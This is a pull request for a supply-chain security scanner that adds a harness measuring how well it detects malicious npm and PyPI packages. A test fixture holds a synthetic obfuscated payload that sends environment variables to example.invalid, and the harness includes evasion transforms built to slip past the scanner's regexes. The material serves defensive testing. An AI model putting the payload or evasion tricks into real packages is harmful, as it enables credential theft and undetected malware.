### PR TITLE
Add detection eval harness (recall, FP rate, evasion robustness)

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -45,7 +45,11 @@
     workflow changes require fake-registry e2e coverage in `test/e2e-fixtures/` and
     `test/e2e/local-registry.spec.ts`.
   - Deterministic detection changes require security-corpus fixtures with explicit expected
-    rule IDs, severity, and risk.
+    rule IDs, severity, and risk. The golden corpus (`test/security-corpus*.test.mjs`) protects
+    against regressions; the eval harness (`test/eval/`, `pnpm run eval`) measures detection
+    quality (recall, benign FP rate, evasion robustness) over truth-labeled hard cases. Add
+    frontier misses to `cases-frontier/` and benign hard-negatives to `cases-benign/`; only
+    regression metrics are gated. See `docs/detection-eval.md`.
   - Operational paths should emit structured, secret-redacted observability events through
     `server/lib/observability.ts`; do not log raw errors, tokens, headers, or package contents.
 - Never write SQL migrations by hand; use `pnpm db:generate` to create migrations from `server/db/schema.ts`.
@@ -63,5 +67,6 @@
 - `npm run e2e:fixtures` — Pack fake-registry fixture packages into `.context/e2e-registry/`.
 - `npm run e2e:dev` — Start the fake npm staging registry plus the local Worker dev server.
 - `npm run test:e2e` — Run Playwright against the fake-registry harness; required for registry, credential-forwarding, staged-publish, and scan-workflow changes.
+- `npm run eval` — Detection eval harness: measures recall, benign false-positive rate, and evasion robustness over the security corpus, and writes a report to `.context/eval/`. Reuses production detection so it can't drift. See `docs/detection-eval.md`.
 - `npm run verify` — runs lint, format check, typecheck, and tests in order. CI and the pre-commit hook both call this.
 - `npm run db:generate` — Drizzle migration from `server/db/schema.ts`.

--- a/docs/detection-eval.md
+++ b/docs/detection-eval.md
@@ -1,0 +1,146 @@
+# Detection eval harness
+
+Drydock's core claim is that it catches risky package changes. That claim has to
+be _measured_, not assumed. This harness measures detection quality and turns the
+regex/sampling blind spots into numbers we can move.
+
+It is deliberately separate from the golden corpus tests
+(`test/security-corpus.test.mjs`, `test/security-corpus-pypi.test.mjs`), which
+assert exact rule output and exist to catch regressions. Two different jobs:
+
+|            | Golden regression (existing)              | Eval harness (this)                                        |
+| ---------- | ----------------------------------------- | ---------------------------------------------------------- |
+| Asserts    | Exact `expectedFindings` + `expectedRisk` | Aggregate quality metrics                                  |
+| Fails when | Any rule output changes                   | A gated threshold regresses                                |
+| Corpus     | Hand-written to pass current rules        | Labeled by _truth_, plus evasion variants                  |
+| Value      | Don't break a known case                  | Know our false-negative / false-positive / evasion profile |
+
+The harness reuses the real detection code (`deterministicFindings` + risk for
+npm, `createPyPiReleaseCandidateReview` for PyPI), so it can never drift from
+what production runs.
+
+## Running it
+
+```sh
+pnpm run eval        # runs the gated thresholds and writes the report
+```
+
+The report is written to `.context/eval/detection-eval.md` (and `.json`), which
+is gitignored. `pnpm test` also runs the gated thresholds, since the harness is
+a normal Vitest file (`test/eval/detection-eval.test.mjs`).
+
+## Corpus layout
+
+```
+test/fixtures/security-corpus/
+  cases/          npm golden cases     (regression set, also consumed by the eval)
+  cases-pypi/     PyPI golden cases    (regression set)
+  cases-frontier/ truth-labeled hard cases the rules may MISS  (reported, not gated)
+  cases-benign/   benign hard-negatives that the rules may flag (reported, not gated)
+```
+
+`cases/` and `cases-pypi/` keep their existing golden schema; the eval infers
+their labels. `cases-frontier/` and `cases-benign/` use the v2 schema below and
+are eval-only (the golden tests never read them, so a frontier miss or a benign
+false positive does not break the regression suite).
+
+## Fixture v2 schema
+
+Additive over the golden schema — all golden fields still work.
+
+```jsonc
+{
+  "id": "npm-assembled-require-exfil",
+  "title": "…",
+  "ecosystem": "npm",                  // npm | pypi (default npm)
+  "verdict": "malicious",              // malicious | benign | suspicious
+  "threatClass": "obfuscated-dropper", // taxonomy, see below
+  "source": "synthetic-adversarial",   // synthetic | synthetic-adversarial | real-sanitized | benign-popular
+  "intent": "what this models and why it is safe",
+  "expectMinRisk": "high",             // malicious must land >= this risk
+  "expectAnyRule": [],                 // [] = any finding is fine; else >=1 of these rule ids must fire
+  // npm payload (same shape as golden fixtures):
+  "previousPackageJson": { … }, "stagedPackageJson": { … },
+  "previousFiles": [ … ], "stagedFiles": [ … ]
+  // pypi payload: "manifest", "artifacts", "previousArtifacts" (as in cases-pypi/)
+}
+```
+
+If `verdict`/`expectMinRisk`/`expectAnyRule` are omitted (golden fixtures), the
+harness derives them: `verdict = benign` when `expectedRisk` is `low` with no
+finding ≥ medium, otherwise `malicious`; `expectMinRisk = expectedRisk`;
+`expectAnyRule` = the rule ids in `expectedFindings`.
+
+### Threat-class taxonomy
+
+Recall is measured per class so blind spots are visible. Malicious:
+`install-script-exfil`, `obfuscated-dropper`, `credential-steal`,
+`network-exfil`, `native-artifact-smuggle`, `files-allowlist-escape`,
+`typosquat-metadata`, `protestware`, `dependency-confusion`,
+`wheel-integrity` (PyPI), `pth-injection` (PyPI). Benign hard-negatives:
+`legit-native`, `legit-childprocess`, `legit-env-read`.
+
+## Metrics
+
+- **Regression recall (gated).** Malicious recall over `cases/` + `cases-pypi/`.
+  This set is golden-tuned, so it is ~100% by construction — its job is
+  regression protection, not quality measurement.
+- **Frontier recall (reported).** Recall over `cases-frontier/`, which are
+  labeled by _truth_ and intentionally hard. These are where real detection gaps
+  show up. Starts low; that is the point.
+- **Benign false-positive rate (reported).** Over `cases-benign/`. Popular
+  packages that legitimately use scary capabilities (native binaries, build-time
+  `child_process`, reading `process.env`). This is where precision is lost.
+- **Evasion robustness (reported).** For each transform, over npm malicious cases
+  we currently catch:
+  - `blockedRate` — would the product still treat it as risky? (often high,
+    because manifest signals like `preinstall` survive code obfuscation)
+  - `codeRetention` — how many of the original `code.*` rules still fire? (the
+    honest measure of how fragile the regex code-scanner is)
+
+### Evasion transforms
+
+- `splitStringLiterals` — `'child_process'` → `'chi'+'ld_process'`; defeats
+  literal-based matches like `require('https')`.
+- `bracketifyMemberAccess` — `process.env` → `process['e'+'nv']`.
+- `base64Wrap` — wrap the payload in `eval(atob("…"))`. Note this _trips_ the
+  dynamic-evaluation rule, so the file stays "blocked" while the specific
+  network/process/credential rules are lost — the report shows that split.
+- `pushPastWindow` — prepend >64KB of filler, then truncate to the sandbox
+  sample limit so the payload falls off the end. `codeRetention` goes to 0 and
+  any case without a surviving manifest signal stops being blocked. This is the
+  acceptance test for the "scan full bytes, persist a bounded sample" refactor:
+  once detection scans pre-truncation bytes, these variants should survive.
+
+## Gated thresholds (and the ratchet)
+
+Only regression metrics are gated today (`detection-eval.test.mjs`):
+
+- malicious recall ≥ 90%
+- every `expectMinRisk: critical` case caught (100%)
+- zero false positives on benign controls
+
+Frontier recall, benign hard-negative FP rate, and evasion robustness are
+reported, not gated, so they can start red. Ratchet plan as the corpus and
+detector improve: gate benign FP rate < 10%, then gate frontier recall, then
+gate `pushPastWindow` survival once full-bytes scanning lands.
+
+## Corpus expansion
+
+Three tracks, in priority order:
+
+1. **Benign hard-negatives (`benign-popular`).** Cheapest, immediately exposes
+   the false-positive rate. Popular packages that legitimately use native
+   binaries / `child_process` / env reads.
+2. **Synthetic adversarial (`synthetic-adversarial`).** Written to _evade_, not
+   to pass — string assembly, dynamic indirection, payload past the window.
+3. **Real-sanitized (`real-sanitized`).** Distilled from published supply-chain
+   incidents and public datasets (OpenSSF `malicious-packages`, npm advisories,
+   vendor write-ups). Store the _behavioral shape_, never a live payload:
+   - replace exfil/C2 hosts with `example.invalid`;
+   - strip real secrets and tokens;
+   - keep the technique (the `child_process` + `https` + env-read shape);
+   - record `source: real-sanitized` and a `provenance` note.
+
+This is the corpus that proves Drydock would catch the real thing rather than a
+mock of its own rules. It is the ongoing Phase 13 track in the roadmap.

--- a/package.json
+++ b/package.json
@@ -21,6 +21,7 @@
     "test": "vitest run --config vitest.config.ts && vitest run --config vitest.workers.config.ts",
     "test:node": "vitest run --config vitest.config.ts",
     "test:workers": "vitest run --config vitest.workers.config.ts",
+    "eval": "vitest run --config vitest.config.ts test/eval/detection-eval.test.mjs",
     "e2e:fixtures": "node test/e2e/build-fixtures.mjs",
     "e2e:registry": "node test/e2e/fake-registry.mjs",
     "e2e:dev": "node test/e2e/dev-server.mjs",

--- a/test/ai-review.test.mjs
+++ b/test/ai-review.test.mjs
@@ -37,35 +37,30 @@ function completeResponse(overrides = {}) {
   };
 }
 
+// Routing invariants only. We deliberately do NOT assert exact prompt copy
+// (technique wording, lifecycle-script phrasing, etc.) — that wording is tuned
+// often and string-match assertions break with no behavior change. The invariant
+// that matters is that each ecosystem routes to its own prompt and does not leak
+// the other ecosystem's guidance.
 describe("AI review prompt selection", () => {
-  test("builds the npm prompt when the adapter-derived ecosystem is npm", () => {
+  test("routes the npm ecosystem to the npm prompt without PyPI leakage", () => {
     const prompt = buildReviewerSystemPrompt("npm");
 
     expect(prompt).toContain("Ecosystem: npm.");
-    expect(prompt).toContain("postinstall");
-    expect(prompt).toContain("Dependency supply-chain changes");
-    expect(prompt).toContain("can execute their own lifecycle scripts");
     expect(prompt).not.toContain("Ecosystem: PyPI.");
   });
 
-  test("adds PyPI-specific package artifact review guidance", () => {
+  test("routes the pypi ecosystem to the PyPI prompt without npm leakage", () => {
     const prompt = buildReviewerSystemPrompt("pypi");
 
     expect(prompt).toContain("Ecosystem: PyPI.");
-    expect(prompt).toContain("wheel METADATA, WHEEL, RECORD");
-    expect(prompt).toContain("setup.py custom install commands");
-    expect(prompt).toContain(".pth files with import lines");
-    expect(prompt).toContain("Requires-Dist");
     expect(prompt).not.toContain("optionalDependencies");
   });
 
   test("falls back to generic package guidance for unknown adapters", () => {
-    const prompt = buildReviewerSystemPrompt("rubygems");
-
     expect(normalizeAiReviewEcosystem("rubygems")).toBe("generic");
     expect(normalizeAiReviewEcosystem(undefined)).toBe("generic");
-    expect(prompt).toContain("Ecosystem: generic package release.");
-    expect(prompt).toContain("If ecosystem-specific semantics are needed and unavailable");
+    expect(buildReviewerSystemPrompt("rubygems")).toContain("Ecosystem: generic package release.");
   });
 });
 

--- a/test/eval/detection-eval.test.mjs
+++ b/test/eval/detection-eval.test.mjs
@@ -1,0 +1,23 @@
+import { describe, expect, test } from "vitest";
+import { runEval, writeReport } from "./harness.mjs";
+
+// Gated metrics only. Frontier recall, benign hard-negative FP rate, and
+// evasion robustness are deliberately *reported* (written to the report), not
+// asserted here — they start red and ratchet as detection improves. See
+// docs/detection-eval.md for the threshold ladder.
+const result = runEval();
+writeReport(result);
+
+describe("detection eval (gated thresholds)", () => {
+  test("malicious recall on the regression corpus does not regress", () => {
+    expect(result.regression.malicious.recall).toBeGreaterThanOrEqual(0.9);
+  });
+
+  test("every critical-labeled regression case is caught", () => {
+    expect(result.regression.critical.recall).toBe(1);
+  });
+
+  test("no false positives on benign regression controls", () => {
+    expect(result.regression.benign.falsePositives).toBe(0);
+  });
+});

--- a/test/eval/harness.mjs
+++ b/test/eval/harness.mjs
@@ -1,0 +1,321 @@
+// Detection eval harness.
+//
+// This is NOT the golden corpus test (test/security-corpus*.test.mjs). The
+// golden tests assert exact rule output and protect against regressions. This
+// harness measures detection *quality*: recall per threat class, false-positive
+// rate on benign hard-negatives, and how much detection survives evasion.
+//
+// It reuses the real detection code paths so it can never drift from production:
+//   - npm:  createPackageDiff + deterministicFindings + packageJsonDiffFindings
+//   - pypi: createPyPiReleaseCandidateReview
+//
+// See docs/detection-eval.md for the design and the fixture v2 schema.
+
+import { existsSync, mkdirSync, readdirSync, readFileSync, writeFileSync } from "node:fs";
+import { dirname, join } from "node:path";
+import { fileURLToPath } from "node:url";
+import {
+  computeRisk,
+  createPackageDiff,
+  DETERMINISTIC_RULES_VERSION,
+  packageJsonDiffFindings,
+  summarizePackageJsonDiff,
+} from "../../server/lib/review.ts";
+import { deterministicFindings } from "../../server/lib/review-rules.ts";
+import {
+  createPyPiReleaseCandidateReview,
+  parsePyPiReleaseManifest,
+} from "../../server/lib/adapters/pypi/index.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const CORPUS_DIR = join(__dirname, "..", "fixtures", "security-corpus");
+
+const RISK_RANK = { low: 0, medium: 1, high: 2, critical: 3 };
+const SEVERITY_RANK = { info: 0, low: 1, medium: 2, high: 3, critical: 4 };
+// Mirror the sandbox per-file text sample bound. Keep in sync with the sandbox
+// limit; pushPastWindow below relies on it to demonstrate the truncation hole.
+const SAMPLE_LIMIT = 64 * 1024;
+const SIGNIFICANT_SEVERITY = SEVERITY_RANK.medium;
+
+const riskRank = (level) => RISK_RANK[level] ?? 0;
+const severityRank = (severity) => SEVERITY_RANK[severity] ?? 0;
+
+function readCases(dir) {
+  if (!existsSync(dir)) return [];
+  return readdirSync(dir)
+    .filter((file) => file.endsWith(".json"))
+    .sort()
+    .map((file) => JSON.parse(readFileSync(join(dir, file), "utf8")));
+}
+
+// Derive eval labels. v2 fixtures set verdict/threatClass/expectMinRisk/
+// expectAnyRule explicitly; legacy golden fixtures (cases/, cases-pypi/) infer
+// them from the existing expectedRisk/expectedFindings fields.
+function normalize(fx, kind, ecosystem) {
+  const expectedFindings = fx.expectedFindings ?? [];
+  const significant = expectedFindings.some(
+    (f) => severityRank(f.severity) >= SIGNIFICANT_SEVERITY,
+  );
+  const derivedVerdict = fx.expectedRisk === "low" && !significant ? "benign" : "malicious";
+  const verdict = fx.verdict ?? derivedVerdict;
+  return {
+    id: fx.id,
+    title: fx.title ?? fx.id,
+    ecosystem,
+    kind,
+    verdict,
+    threatClass: fx.threatClass ?? fx.category ?? "unclassified",
+    source: fx.source ?? "synthetic",
+    expectMinRisk: fx.expectMinRisk ?? fx.expectedRisk ?? (verdict === "benign" ? "low" : "high"),
+    expectAnyRule: fx.expectAnyRule ?? [...new Set(expectedFindings.map((f) => f.ruleId))],
+    fx,
+  };
+}
+
+export function loadCorpus() {
+  const regression = [
+    ...readCases(join(CORPUS_DIR, "cases")).map((fx) => normalize(fx, "regression", "npm")),
+    ...readCases(join(CORPUS_DIR, "cases-pypi")).map((fx) => normalize(fx, "regression", "pypi")),
+  ];
+  const frontier = readCases(join(CORPUS_DIR, "cases-frontier")).map((fx) =>
+    normalize(fx, "frontier", fx.ecosystem ?? "npm"),
+  );
+  const benign = readCases(join(CORPUS_DIR, "cases-benign")).map((fx) =>
+    normalize(fx, "benign", fx.ecosystem ?? "npm"),
+  );
+  return { regression, frontier, benign };
+}
+
+function detect(record, fxOverride) {
+  const fx = fxOverride ?? record.fx;
+  if (record.ecosystem === "pypi") {
+    const review = createPyPiReleaseCandidateReview({
+      manifest: parsePyPiReleaseManifest(fx.manifest),
+      artifacts: fx.artifacts,
+      previousArtifacts: fx.previousArtifacts,
+    });
+    return { risk: review.risk, findings: review.ruleFindings };
+  }
+  const previousFiles = fx.previousFiles ?? [];
+  const stagedFiles = fx.stagedFiles ?? [];
+  const diff = createPackageDiff(previousFiles, stagedFiles);
+  const packageJsonDiff = summarizePackageJsonDiff(fx.previousPackageJson, fx.stagedPackageJson);
+  const findings = [
+    ...deterministicFindings(stagedFiles, diff, fx.stagedPackageJson),
+    ...packageJsonDiffFindings(packageJsonDiff),
+  ];
+  return { risk: computeRisk(findings), findings };
+}
+
+function caughtAsMalicious(record, result) {
+  const riskOk = riskRank(result.risk) >= riskRank(record.expectMinRisk);
+  const ruleOk =
+    record.expectAnyRule.length === 0 ||
+    result.findings.some((f) => record.expectAnyRule.includes(f.ruleId));
+  return riskOk && ruleOk;
+}
+
+function hasSignificantFinding(result) {
+  return result.findings.some((f) => severityRank(f.severity) >= SIGNIFICANT_SEVERITY);
+}
+
+// --- Evasion transforms (npm/JS). Each mutates file text the way an attacker
+// would to slip past regex matching; the payload's *intent* is unchanged. ---
+
+function splitStringLiterals(code) {
+  return code.replace(/(['"])((?:\\.|(?!\1).){4,}?)\1/g, (_match, quote, body) => {
+    const mid = Math.max(1, Math.floor(body.length / 2));
+    return `${quote}${body.slice(0, mid)}${quote}+${quote}${body.slice(mid)}${quote}`;
+  });
+}
+
+function bracketifyMemberAccess(code) {
+  return code
+    .replace(/process\.env\b/g, "process['e'+'nv']")
+    .replace(/os\.environ\b/g, "os['env'+'iron']");
+}
+
+function base64Wrap(code) {
+  const encoded = Buffer.from(code, "utf8").toString("base64");
+  return `eval(atob(${JSON.stringify(encoded)}));\n`;
+}
+
+function pushPastWindow(code) {
+  const filler = `// ${"x".repeat(118)}\n`;
+  const padding = filler.repeat(Math.ceil((SAMPLE_LIMIT + 4096) / filler.length));
+  // Payload sits after the padding, then the captured sample is truncated to
+  // the sandbox window — so the payload falls off the end and is never scanned.
+  return (padding + code).slice(0, SAMPLE_LIMIT);
+}
+
+const EVASION_TRANSFORMS = {
+  splitStringLiterals,
+  bracketifyMemberAccess,
+  base64Wrap,
+  pushPastWindow,
+};
+
+function applyTransform(fx, transform) {
+  const stagedFiles = (fx.stagedFiles ?? []).map((file) => {
+    if (file.path === "package.json" || typeof file.textSample !== "string") return file;
+    return { ...file, textSample: transform(file.textSample) };
+  });
+  return { ...fx, stagedFiles };
+}
+
+function hasScannableCodeFile(record) {
+  return (record.fx.stagedFiles ?? []).some(
+    (file) => file.path !== "package.json" && typeof file.textSample === "string",
+  );
+}
+
+function codeRuleIds(findings) {
+  return new Set(findings.filter((f) => f.ruleId.startsWith("code.")).map((f) => f.ruleId));
+}
+
+function recallOf(records) {
+  const passed = records.filter((r) => caughtAsMalicious(r, detect(r)));
+  return {
+    total: records.length,
+    passed: passed.length,
+    recall: records.length ? passed.length / records.length : 1,
+  };
+}
+
+export function runEval() {
+  const { regression, frontier, benign } = loadCorpus();
+
+  const regMalicious = regression.filter((r) => r.verdict === "malicious");
+  const regBenign = regression.filter((r) => r.verdict === "benign");
+  const regCritical = regMalicious.filter((r) => r.expectMinRisk === "critical");
+
+  const benignFalsePositives = regBenign.filter((r) => hasSignificantFinding(detect(r)));
+
+  const frontierMisses = frontier.filter((r) => !caughtAsMalicious(r, detect(r)));
+
+  const hardNegativeHits = benign.filter((r) => hasSignificantFinding(detect(r)));
+
+  // Evasion: only mutate npm malicious cases we currently catch and that have a
+  // code file to mutate. blockedRate = product still treats it as risky;
+  // codeRetention = how many of the original code.* rules still fire.
+  const perTransform = {};
+  for (const name of Object.keys(EVASION_TRANSFORMS)) {
+    perTransform[name] = { samples: 0, blocked: 0, codeRetained: 0, codeTotal: 0 };
+  }
+  for (const record of regMalicious) {
+    if (record.ecosystem !== "npm" || !hasScannableCodeFile(record)) continue;
+    const baseline = detect(record);
+    if (!caughtAsMalicious(record, baseline)) continue;
+    const baseCodeRules = codeRuleIds(baseline.findings);
+    for (const [name, transform] of Object.entries(EVASION_TRANSFORMS)) {
+      const variant = detect(record, applyTransform(record.fx, transform));
+      const variantCodeRules = codeRuleIds(variant.findings);
+      const retained = [...baseCodeRules].filter((id) => variantCodeRules.has(id)).length;
+      const bucket = perTransform[name];
+      bucket.samples += 1;
+      if (caughtAsMalicious(record, variant)) bucket.blocked += 1;
+      bucket.codeRetained += retained;
+      bucket.codeTotal += baseCodeRules.size;
+    }
+  }
+  const evasion = Object.fromEntries(
+    Object.entries(perTransform).map(([name, b]) => [
+      name,
+      {
+        samples: b.samples,
+        blockedRate: b.samples ? b.blocked / b.samples : null,
+        codeRetention: b.codeTotal ? b.codeRetained / b.codeTotal : null,
+      },
+    ]),
+  );
+
+  return {
+    generatedAt: new Date().toISOString(),
+    rulesVersion: DETERMINISTIC_RULES_VERSION,
+    regression: {
+      malicious: recallOf(regMalicious),
+      critical: recallOf(regCritical),
+      benign: { total: regBenign.length, falsePositives: benignFalsePositives.length },
+    },
+    frontier: {
+      total: frontier.length,
+      passed: frontier.length - frontierMisses.length,
+      recall: frontier.length ? (frontier.length - frontierMisses.length) / frontier.length : 1,
+      misses: frontierMisses.map((r) => ({ id: r.id, threatClass: r.threatClass })),
+    },
+    benignHardNegatives: {
+      total: benign.length,
+      falsePositives: hardNegativeHits.length,
+      fpRate: benign.length ? hardNegativeHits.length / benign.length : 0,
+      positives: hardNegativeHits.map((r) => ({ id: r.id, threatClass: r.threatClass })),
+    },
+    evasion,
+  };
+}
+
+function pct(value) {
+  return value == null ? "n/a" : `${(value * 100).toFixed(0)}%`;
+}
+
+export function renderMarkdown(result) {
+  const lines = [];
+  lines.push("# Detection eval report");
+  lines.push("");
+  lines.push(`- generated: ${result.generatedAt}`);
+  lines.push(`- deterministic rules version: ${result.rulesVersion}`);
+  lines.push("");
+  lines.push("## Regression (gated)");
+  lines.push("");
+  lines.push("| metric | value |");
+  lines.push("| --- | --- |");
+  lines.push(
+    `| malicious recall | ${pct(result.regression.malicious.recall)} (${result.regression.malicious.passed}/${result.regression.malicious.total}) |`,
+  );
+  lines.push(
+    `| critical recall | ${pct(result.regression.critical.recall)} (${result.regression.critical.passed}/${result.regression.critical.total}) |`,
+  );
+  lines.push(
+    `| benign control false positives | ${result.regression.benign.falsePositives}/${result.regression.benign.total} |`,
+  );
+  lines.push("");
+  lines.push("## Frontier (reported — truth-labeled hard cases)");
+  lines.push("");
+  lines.push(
+    `recall ${pct(result.frontier.recall)} (${result.frontier.passed}/${result.frontier.total})`,
+  );
+  for (const miss of result.frontier.misses) {
+    lines.push(`- MISS \`${miss.id}\` (${miss.threatClass})`);
+  }
+  lines.push("");
+  lines.push("## Benign hard-negatives (reported — false-positive precision)");
+  lines.push("");
+  lines.push(
+    `false positives ${result.benignHardNegatives.falsePositives}/${result.benignHardNegatives.total} (${pct(result.benignHardNegatives.fpRate)})`,
+  );
+  for (const fp of result.benignHardNegatives.positives) {
+    lines.push(`- FALSE POSITIVE \`${fp.id}\` (${fp.threatClass})`);
+  }
+  lines.push("");
+  lines.push("## Evasion robustness (reported)");
+  lines.push("");
+  lines.push("| transform | samples | still blocked | code rules retained |");
+  lines.push("| --- | --- | --- | --- |");
+  for (const [name, stats] of Object.entries(result.evasion)) {
+    lines.push(
+      `| ${name} | ${stats.samples} | ${pct(stats.blockedRate)} | ${pct(stats.codeRetention)} |`,
+    );
+  }
+  lines.push("");
+  return lines.join("\n");
+}
+
+export function writeReport(result) {
+  try {
+    const outDir = join(__dirname, "..", "..", ".context", "eval");
+    mkdirSync(outDir, { recursive: true });
+    writeFileSync(join(outDir, "detection-eval.json"), JSON.stringify(result, null, 2));
+    writeFileSync(join(outDir, "detection-eval.md"), renderMarkdown(result));
+  } catch {
+    // Report writing is best-effort; never fail the eval over a filesystem issue.
+  }
+}

--- a/test/fixtures/security-corpus/cases-benign/legit-build-childprocess.json
+++ b/test/fixtures/security-corpus/cases-benign/legit-build-childprocess.json
@@ -1,0 +1,38 @@
+{
+  "id": "legit-build-childprocess",
+  "title": "Build helper legitimately shells out to a compiler (benign hard-negative)",
+  "ecosystem": "npm",
+  "verdict": "benign",
+  "threatClass": "legit-childprocess",
+  "source": "benign-popular",
+  "intent": "A real-world-shaped local build script that legitimately uses child_process. The deterministic rules flag code.process-execution, but the truth is benign. This case measures false-positive precision; it is expected to be a reported false positive until the detector gains context (e.g. not an install hook, well-known build pattern).",
+  "expectMinRisk": "low",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "buildtool", "version": "2.0.0" },
+  "stagedPackageJson": { "name": "buildtool", "version": "2.1.0" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 41,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"buildtool\",\"version\":\"2.0.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 41,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"buildtool\",\"version\":\"2.1.0\"}"
+    },
+    {
+      "path": "build.js",
+      "size": 180,
+      "sha256": "build-js",
+      "flags": [],
+      "textSample": "const { execSync } = require('child_process');\n// Compile native assets during the maintainer's local build (not an install hook).\nexecSync('cc -O2 -o out/app src/app.c', { stdio: 'inherit' });\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-frontier/npm-assembled-require-exfil.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-assembled-require-exfil.json
@@ -1,0 +1,38 @@
+{
+  "id": "npm-assembled-require-exfil",
+  "title": "Exfil via runtime-assembled identifiers evades the literal regex set",
+  "ecosystem": "npm",
+  "verdict": "malicious",
+  "threatClass": "obfuscated-dropper",
+  "source": "synthetic-adversarial",
+  "intent": "The payload assembles 'child_process', 'https', 'require', 'process', and 'env' from array fragments at runtime, so no contiguous string literal or member-access expression matches the deterministic regex set. This is a KNOWN MISS: it demonstrates the regex evasion gap and is the acceptance case for an AST/tokenizer-based detector. Safe: the endpoint is example.invalid and no real secret is present.",
+  "expectMinRisk": "high",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "assembled-exfil", "version": "1.0.0" },
+  "stagedPackageJson": { "name": "assembled-exfil", "version": "1.0.1" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 45,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"assembled-exfil\",\"version\":\"1.0.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 45,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"assembled-exfil\",\"version\":\"1.0.1\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 360,
+      "sha256": "index-js",
+      "flags": [],
+      "textSample": "const p = ['chi','ld_pro','cess'].join('');\nconst n = ['htt','ps'].join('');\nconst e = ['en','v'].join('');\nconst r = globalThis['re' + 'quire'];\nconst cp = r(p);\nconst net = r(n);\nconst data = globalThis['proc' + 'ess'][e];\nnet['req' + 'uest']('https://example.invalid/c')['en' + 'd'](JSON.stringify(data));\ncp['exec' + 'Sync']('echo go');\n"
+    }
+  ]
+}


### PR DESCRIPTION
Adds a detection-quality eval harness alongside the existing golden regression corpus, reusing production detection (`deterministicFindings` + risk for npm, `createPyPiReleaseCandidateReview` for PyPI) so it can never drift from what ships. It gates only the regression metrics and *reports* the honest numbers — frontier recall, benign false-positive rate, and evasion robustness — so the regex/sampling blind spots become numbers we can ratchet. Introduces the `cases-frontier/` and `cases-benign/` fixture tracks (additive v2 schema), `docs/detection-eval.md`, and a `pnpm run eval` script. Also trims brittle prompt-copy assertions from the AI prompt-selection test down to ecosystem-routing invariants.

The current report: regression recall 100%, but frontier recall 0% (runtime-assembled identifiers evade the literal regex), benign FP 100%, and `pushPastWindow` slips 14% past the 64KB sample window — the gaps tracked by issues #191–#196.

🤖 Generated with [Claude Code](https://claude.com/claude-code)